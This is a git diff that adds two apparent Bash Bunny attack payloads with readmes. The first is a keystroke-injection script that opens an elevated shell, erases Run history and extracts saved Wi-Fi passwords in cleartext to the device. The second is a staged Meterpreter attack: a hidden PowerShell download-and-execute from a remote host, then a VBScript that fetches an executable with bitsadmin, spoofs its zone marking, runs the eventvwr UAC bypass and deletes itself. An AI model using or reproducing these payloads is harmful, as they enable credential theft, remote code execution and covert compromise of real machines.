diff --git a/payloads/library/WifiGrabber/ducky_script.txt b/payloads/library/WifiGrabber/ducky_script.txt new file mode 100755 index 00000000..c85f3586 --- /dev/null +++ b/payloads/library/WifiGrabber/ducky_script.txt @@ -0,0 +1,69 @@ +REM Title: WiFi password grabber for the bash bunny +REM Author: Silvian +REM Props: Siem, Darren Kitchen +REM Version: 1 +REM Description: Saves the SSID, Network type, Authentication and the password to Log.txt +DELAY 1000 +GUI r +DELAY 1000 +STRING powershell Start-Process cmd -Verb runAs +ENTER +DELAY 2000 +LEFT +DELAY 1000 +ENTER +DELAY 1000 + +REM Delete registry keys storing Run dialog history +STRING REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f +ENTER + +REM --> Getting SSID +STRING cd "%TEMP%" & for /f "tokens=2 delims=: " %A in ('netsh wlan show interface ^| findstr "SSID" ^| findstr /v "BSSID"') do set A=%A +ENTER + +REM --> Creating A.txt +STRING netsh wlan show profiles %A% key=clear | findstr /c:"Network type" /c:"Authentication" /c:"Key Content" | findstr /v "broadcast" | findstr /v "Radio">>A.txt +ENTER + +REM --> Get network type +STRING for /f "tokens=3 delims=: " %A in ('findstr "Network type" A.txt') do set B=%A +ENTER + +REM --> Get authentication +STRING for /f "tokens=2 delims=: " %A in ('findstr "Authentication" A.txt') do set C=%A +ENTER + +REM --> Get password +STRING for /f "tokens=3 delims=: " %A in ('findstr "Key Content" A.txt') do set D=%A +ENTER + +REM --> Delete A.txt +STRING del A.txt +ENTER + +REM --> Create Log.txt +STRING echo SSID: %A%>>Log.txt & echo Network type: %B%>>Log.txt & echo Authentication: %C%>>Log.txt & echo Password: %D%>>Log.txt +ENTER + +REM Creates directory compromised of computer name, date and time +REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious +STRING for /f %D in ('wmic volume get DriveLetter^, Label ^| find "BashBunny"') do set usb=%D +ENTER +DELAY 200 +ENTER + +REM Create directory on the bash bunny as wifi creds and computer name and date time stamp +STRING set dst=%usb%\loot\WiFi_Creds\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2% +ENTER +DELAY 200 +ENTER +STRING mkdir %dst% >>nul +ENTER + +REM Move the Log.txt to the created directory on the bash bunny +STRING move Log.txt %dst% >>nul +ENTER +DELAY 100 +STRING exit +ENTER diff --git a/payloads/library/WifiGrabber/payload.txt b/payloads/library/WifiGrabber/payload.txt new file mode 100755 index 00000000..e5e9158a --- /dev/null +++ b/payloads/library/WifiGrabber/payload.txt @@ -0,0 +1,38 @@ +#!/bin/bash + +# @title: WiFi Windows password grabber for the bash bunny +# @author: Silvian Dragan +# @props: Siem, Darren Kitchen +# @version: 1.0 +# @target: Windows 7 (not tested for 8 and above) +# +# +# @details: This is a simple Wifi password grabber tested and working for Windows 7 +# However this has not been tested on Windows 8 and above and any suggestions and +# improvements are greatly welcomed. Powershell scripting isn't higest skill so +# I'm sure I'll have much to learn. +# +# +# Colors: +# Purple: starts the attack payload +# Green: successful execution +# Red: failure to load dependency ducky script +# + + +ATTACKMODE HID STORAGE + +LED R B 200 + +LANGUAGE=‘us’ + +source bunny_helpers.sh + +if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then + QUACK ${SWITCH_POSITION}/ducky_script.txt + LED G +else + LED R + echo "Unable to load ducky_script.txt" >> /root/debuglog.txt + exit 1 +fi diff --git a/payloads/library/WifiGrabber/readme.md b/payloads/library/WifiGrabber/readme.md new file mode 100644 index 00000000..4e175cd8 --- /dev/null +++ b/payloads/library/WifiGrabber/readme.md @@ -0,0 +1,24 @@ +# Windows Wifi Credentials Grabber + +* Author: Silvian +* Version: Version 1.0 +* Target: Windows 7 (not tested on Windows 8 and above) + +## Description + +This is a simple Wifi password grabber tested and working for Windows 7 +However this has not been tested on Windows 8 and above and any suggestions and +improvements are greatly welcomed. Powershell scripting isn't higest skill so +I'm sure I'll have much to learn from sharing this code with everyone. :) + +## Dependencies + +Everything is included - no extra dependencies needed to run this payload. + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Purple | Starts the attack payload | +| Green | successful execution | +| Red | failure to load dependency ducky script | diff --git a/payloads/library/WindowsMeterpreterStaged/payload.txt b/payloads/library/WindowsMeterpreterStaged/payload.txt new file mode 100755 index 00000000..2621808c --- /dev/null +++ b/payloads/library/WindowsMeterpreterStaged/payload.txt @@ -0,0 +1,48 @@ +#!/bin/bash +# +# @title: Bash bunny Windows staged meterpreter payload +# @author: Silvian Dragan +# @props: Darren Kitchen, Mubix +# @version: 1.0 +# @target: Windows 7 8, 8.1 and 10. +# +# +# @details: This is an a advanced meterpreter staged payload injection using the +# rubber ducky capabilites of the bash bunny to call a powershell script referred +# to sc.txt which must be hosted on a remote server. +# This script then downloads the update.exe which is also hosted on +# a remote host, and then executes it on the target machine. +# note it will also attempt to clean up any registry footprint from the run command. +# Once the bash bunny is initialized the script should not take more than +# 2-3 sec to execute. +# +# @Dependencies: you must have sc.txt and update.exe hosted on a remote server. +# replace the 127.0.0.1 with your own host and also feel free to change the name +# of either sc.txt or update.exe to names of your choosing. +# You must also generate the appropariate update.exe payload using msfvenom for +# windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic +# tutorials on metasploit minute/ meterpreter/ msfvenom for details. :) +# +# Colors: +# Amber: starts the attack payload +# Green: successful execution +# Red: failure to load dependency ducky script +# + + +ATTACKMODE HID + +LED R G 200 + +LANGUAGE='us' + +source bunny_helpers.sh + +if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky.txt" ]; then + QUACK ${SWITCH_POSITION}/windows-staged-meterpreter.txt + LED G +else + LED R + echo "Unable to load dwindows-staged-meterpreter.txt" >> /root/debuglog.txt + exit 1 +fi diff --git a/payloads/library/WindowsMeterpreterStaged/readme.md b/payloads/library/WindowsMeterpreterStaged/readme.md new file mode 100644 index 00000000..b60b7980 --- /dev/null +++ b/payloads/library/WindowsMeterpreterStaged/readme.md @@ -0,0 +1,32 @@ +# Windows Meterpreter staged payload + +* Author: Silvian +* Version: Version 1.0 +* Target: Windows 7, 8, 8.1, 10 + +## Description + +This is an a advanced meterpreter staged payload injection using the +rubber ducky capabilites of the bash bunny to call a powershell script referred +to sc.txt which must be hosted on a remote server. +This script then downloads the update.exe which is also hosted on +a remote host, and then executes it on the target machine. +Note it will also attempt to clean up any registry footprint from the run command. +Once the bash bunny is initialized the script should not take more than 2-3 sec to execute. + +## Dependencies + +you must have sc.txt and update.exe hosted on a remote server. +replace the 127.0.0.1 with your own host and also feel free to change the name +of either sc.txt or update.exe to names of your choosing. +You must also generate the appropariate update.exe payload using msfvenom for +windows meterpreter reverse http/https/tcp etc. Please see Mubix's fantastic +tutorials on metasploit minute/ meterpreter/ msfvenom for details. :) + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Amber | Executin Payload | +| Green | Attack Finished | +| Red | Failed to load dependencies | diff --git a/payloads/library/WindowsMeterpreterStaged/sc.txt b/payloads/library/WindowsMeterpreterStaged/sc.txt new file mode 100644 index 00000000..65173b7a --- /dev/null +++ b/payloads/library/WindowsMeterpreterStaged/sc.txt @@ -0,0 +1,30 @@ +Sub Main() + 'Download File + CreateObject("WScript.Shell").run("cmd /c bitsadmin /transfer SoftUpdate /download /priority FOREGROUND http://127.0.0.1/update.exe %temp%/update.exe"),0,true + 'Set new zoneId + CreateObject("WScript.Shell").run("cmd.exe /C echo [zoneTransfer]ZoneID = 2 > " + CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) + "\update.exe:ZONE.identifier"),0,true + 'Write UAC bypass regkey + CreateObject("WScript.Shell").RegWrite "HKCU\Software\Classes\mscfile\shell\open\command\", CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2) +"\update.exe" ,"REG_SZ" + 'Trigger UAC bypass + CreateObject("WScript.Shell").Run("eventvwr.exe"),0,true + 'Reset regkey + GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & "." & "\root\default:StdRegProv").DeleteValue &H80000001,"Software\Classes\mscfile\shell\open\command\","" + 'Remove this script + + CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False +End Sub +'Dont wanna display shit +On Error Resume Next + + Main + + + If Err.Number Then + + 'on error cleanup and exit + + CreateObject("WScript.Shell").Run "cmd /c del " + WScript.ScriptFullName, 0, False + + WScript.Quit 4711 + +End If diff --git a/payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt b/payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt new file mode 100755 index 00000000..225ebb7d --- /dev/null +++ b/payloads/library/WindowsMeterpreterStaged/windows-staged-meterpreter.txt @@ -0,0 +1,7 @@ +REM change 127.0.0.1 to the IP address or host name of your own host service + +DELAY 1000 +GUI r +DELAY 100 +STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://127.0.0.1/sc.txt', '%temp%/update.vbs'); %temp%/update.vbs +ENTER